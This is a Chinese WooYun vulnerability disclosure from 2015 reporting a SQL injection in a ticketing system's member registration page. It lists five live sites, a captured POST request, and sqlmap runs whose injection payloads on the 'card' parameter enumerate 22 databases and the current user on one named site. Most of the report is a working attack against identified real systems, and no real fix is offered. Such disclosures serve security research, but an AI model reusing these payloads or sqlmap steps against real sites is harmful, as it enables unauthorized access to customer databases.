当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101555

漏洞标题:某票务管理系统通用SQL注射漏洞

相关厂商:票友软件

漏洞作者: term

提交时间:2015-03-17 12:08

修复时间:2015-05-01 12:10

公开时间:2015-05-01 12:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://www.bl-air.com/member/reg.aspx
http://www.qichen-air.com/member/reg.aspx
http://www.cht-travel.com/member/reg.aspx
http://www.xwtravel.com/member/reg.aspx
http://www.89937373.com/member/reg.aspx


在点注册的时候抓包

POST /member/reg.aspx HTTP/1.1
Host: www.qichen-air.com
Connection: keep-alive
Content-Length: 609
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.qichen-air.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.69 Safari/537.36 2345chrome v2.5.0.5031
Content-Type: application/x-www-form-urlencoded
Referer: http://www.qichen-air.com/member/reg.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=kbdll4ggf0gf5d1aeqzwq0hz
__VIEWSTATE=%2FwEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly%2FfhqDybEmN%2FXc%2FN4Qap8sLFNfpTZ&__EVENTVALIDATION=%2FwEWFAKxyKKfBgL%2F7vn%2FBAKGzIzaAgLmjOH%2BAQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS%2FawDAoLK%2FawDAs%2BX1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs%2Fv5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU%3D&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=abb95&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=13456465%40qq.com&qq=&msn=&company_name=&address=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C


QQ截图20150315201727.jpg


222.jpg


333.jpg


C:\sqlmap>sqlmap.py -r 2.txt --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:17:57
[20:17:57] [INFO] parsing HTTP request from '2.txt'
[20:17:57] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:17:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: card
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVml
zaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDAT
ION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awD
AoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAI
AsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E
5%AE%A2&name=aaa&card=abb95') AND 3471=3471 AND ('OUrX'='OUrX&pwd=abb95&lxr=&sex
=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=13456465@qq.com&qq=&ms
n=&company_name=&address=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVml
zaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDAT
ION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awD
AoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAI
AsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E
5%AE%A2&name=aaa&card=abb95') AND 1715=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+C
HAR(117)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1715=1715) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(102)+CHAR(113))) AND ('xpXb'='x
pXb&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=
13456465@qq.com&qq=&msn=&company_name=&address=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A
8%E5%86%8C
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVml
zaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDAT
ION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awD
AoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAI
AsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E
5%AE%A2&name=aaa&card=-2740') OR 6798=(SELECT COUNT(*) FROM sysusers AS sys1,sys
users AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys
6,sysusers AS sys7) AND ('kWyd'='kWyd&pwd=abb95&lxr=&sex=%E7%94%B7&phone=1511124
2355&mobile=15111242355&fax=&mail=13456465@qq.com&qq=&msn=&company_name=&address
=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C
---
[20:17:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[20:17:58] [INFO] fetching database names
[20:17:58] [INFO] the SQL query used returns 22 entries
available databases [22]:
[*] master
[*] model
[*] msdb
[*] oa_users
[*] PiaoYou_8800000
[*] PiaoYou_csxjt
[*] PiaoYou_dcswlhy
[*] PiaoYou_dcswlma
[*] PiaoYou_james
[*] PiaoYou_njzb
[*] PiaoYou_sha793
[*] PiaoYou_shanixin
[*] PiaoYou_shaswair
[*] PiaoYou_shazhouxq
[*] PiaoYou_shengjie
[*] PiaoYou_szvlefei
[*] qicheng_web
[*] sha_qicheng
[*] sha_xingchuan
[*] sha_yuanjin
[*] tempdb
[*] zgppt
[20:17:58] [INFO] fetched data logged to text files under 'C:\sqlmap\output\www.
qichen-air.com'
[*] shutting down at 20:17:58
C:\sqlmap>sqlmap.py -r 2.txt --current-user --current-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 20:18:34
[20:18:34] [INFO] parsing HTTP request from '2.txt'
[20:18:34] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:18:34] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: card
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVml
zaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDAT
ION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awD
AoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAI
AsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E
5%AE%A2&name=aaa&card=abb95') AND 3471=3471 AND ('OUrX'='OUrX&pwd=abb95&lxr=&sex
=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=13456465@qq.com&qq=&ms
n=&company_name=&address=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVml
zaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDAT
ION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awD
AoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAI
AsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E
5%AE%A2&name=aaa&card=abb95') AND 1715=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+C
HAR(117)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1715=1715) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(102)+CHAR(113))) AND ('xpXb'='x
pXb&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=
13456465@qq.com&qq=&msn=&company_name=&address=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A
8%E5%86%8C
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVml
zaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDAT
ION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awD
AoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAI
AsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E
5%AE%A2&name=aaa&card=-2740') OR 6798=(SELECT COUNT(*) FROM sysusers AS sys1,sys
users AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys
6,sysusers AS sys7) AND ('kWyd'='kWyd&pwd=abb95&lxr=&sex=%E7%94%B7&phone=1511124
2355&mobile=15111242355&fax=&mail=13456465@qq.com&qq=&msn=&company_name=&address
=&regok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C
---
[20:18:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[20:18:35] [INFO] fetching current user
[20:18:35] [INFO] resumed: qicheng_web
current user:    'qicheng_web'
[20:18:35] [INFO] fetching current database
[20:18:35] [INFO] resumed: qicheng_web
current database:    'qicheng_web'
[20:18:35] [INFO] fetched data logged to text files under 'C:\sqlmap\output\www.
qichen-air.com'
[*] shutting down at 20:18:35
C:\sqlmap>

漏洞证明:

QQ截图20150315201727.jpg


222.jpg


333.jpg

修复方案:

你们更专业!

版权声明:转载请注明来源 term@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝